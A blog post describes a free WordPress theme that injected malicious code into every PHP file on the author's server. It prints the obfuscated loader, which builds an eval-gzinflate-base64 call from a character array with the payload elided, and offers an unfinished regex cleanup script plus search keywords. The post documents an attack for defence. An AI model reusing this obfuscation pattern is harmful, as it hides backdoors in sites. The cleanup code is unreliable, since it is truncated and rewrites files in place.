Home » PHP/MySQL, Regular Expression, WordPress » Free WordPress themes and Malicious/Devil Codes


I know it doesn’t sound good to talk bad here specially when you are writing an article after a long while. We have changed our website theme so it looks simple and loads pretty fast and we are back in to our business of giving things free and expecting nothing back :-) . We don’t ask you to sign-up, we don’t ask you to click or read through our ads, and we don’t ask you to pay for our service. There are many amazing things out there which are absolutely free, like the WordPress platform we are using which is incredible! One would normally not really think twice before using any freely available WordPress theme. I did the same mistake, I went ahead and installed a theme named ‘Freshblog’ created by ‘Best WordPress Themes’ and featured at WordPress Theme Shock and Themes2WP for this site only to realize that I was hacked! I first noticed a few links pointing to some crazy websites being inserted at the bottom of every page which I couldn’t really find where they were coming from. It was not any of the plug-ins doing this. I used the WP Re-install feature to rewrite all the WP files except the Wp-Content and the WP-Config files. The problem didn’t go away. Did a backtrace at different levels and find out a chunk of malicious code in Wp-Config.php. I then did a search for similar pattern in my entire server and whoa! all the PHP files on my server had been injected with this malicious code.

I would not have had any issues if they added a few links back to their site for providing this theme for free but the buggers injected the malicious code in all the PHP files on my server, driving me nuts. Thank God, it was all in the same pattern making it easy for me to clean them using a script.

Now,  how to scan for this malicious script and clean it?

Here is the script I wrote to clean the malicious code from all the PHP files on the server. Copy the below code to a file and put it in your root folder in your server and run it. I am sure most of the free themes from the above mentioned sites would have the malicious code in the same format. I’ll try to add more patterns to this script as you or I come across the others.

$di = new RecursiveDirectoryIterator(getcwd());
foreach (new RecursiveIteratorIterator($di) as $filename => $file) {
	$path = pathinfo($filename);
	if('php' == strtolower($path['extension'])) {
		$content = file_get_contents($filename);
		$replaced = preg_replace('/\<\?php[.\r\n\t\s]*\$md5[.\r\n\t\s]*([^<]+)*/', '', $content);
		if($content != $replaced) {
			file_put_contents($filename, $replaced);
			echo 'Cleaned ' . $filename . '<br/>';

The malicious code in the theme I installed looked like this:

$md5 = "f87975b5d07349ceb2073f410800d343";
$wp_salt = array(';',"n",'t',")","v",'_','e','o',"l",'r',"g",'i','s',"6","a",'b','4',"$",'c','z','d',"f","(");
$wp_add_filter = create_function('$'.'v',$wp_salt[6].$wp_salt[4].$wp_salt[14].$wp_salt[8].$wp_salt[22].$wp_salt[10].$wp_salt[19].$wp_salt[11].$wp_salt[1].$wp_salt[21].$wp_salt[8].$wp_salt[14].$wp_salt[2].$wp_salt[6].$wp_salt[22].$wp_salt[15].$wp_salt[14].$wp_salt[12].$wp_salt[6].$wp_salt[13].$wp_salt[16].$wp_salt[5].$wp_salt[20].$wp_salt[6].$wp_salt[18].$wp_salt[7].$wp_salt[20].$wp_salt[6].$wp_salt[22].$wp_salt[17].$wp_salt[4].$wp_salt[3].$wp_salt[3].$wp_salt[3].$wp_salt[0]);
$wp_add_filter('FZfFzobalkUf........Huge Junk Code Here......obalkU');

There is an excellent post telling you why you should use themes only from WordPress.org. Read here: http://wpmu.org/why-you-should-never-search-for-free-wordpress-themes-in-google-or-anywhere-else/

Before installing any free theme you got from a gallery site, search for terms like ‘md5′, ‘eval’, ‘create_function’, ‘wp_add_filter’, ‘hex’ in your theme source and make sure that they are not malicious code.

You can also install and run the plug-in ‘Exploit Scanner’ to see if you are already hacked. If you see a different pattern for these malicious code, send me the code and I will add the matching patterns for them in my scanner code.

Have Fun!

Leave a Reply

Page optimized by WP Minify WordPress Plugin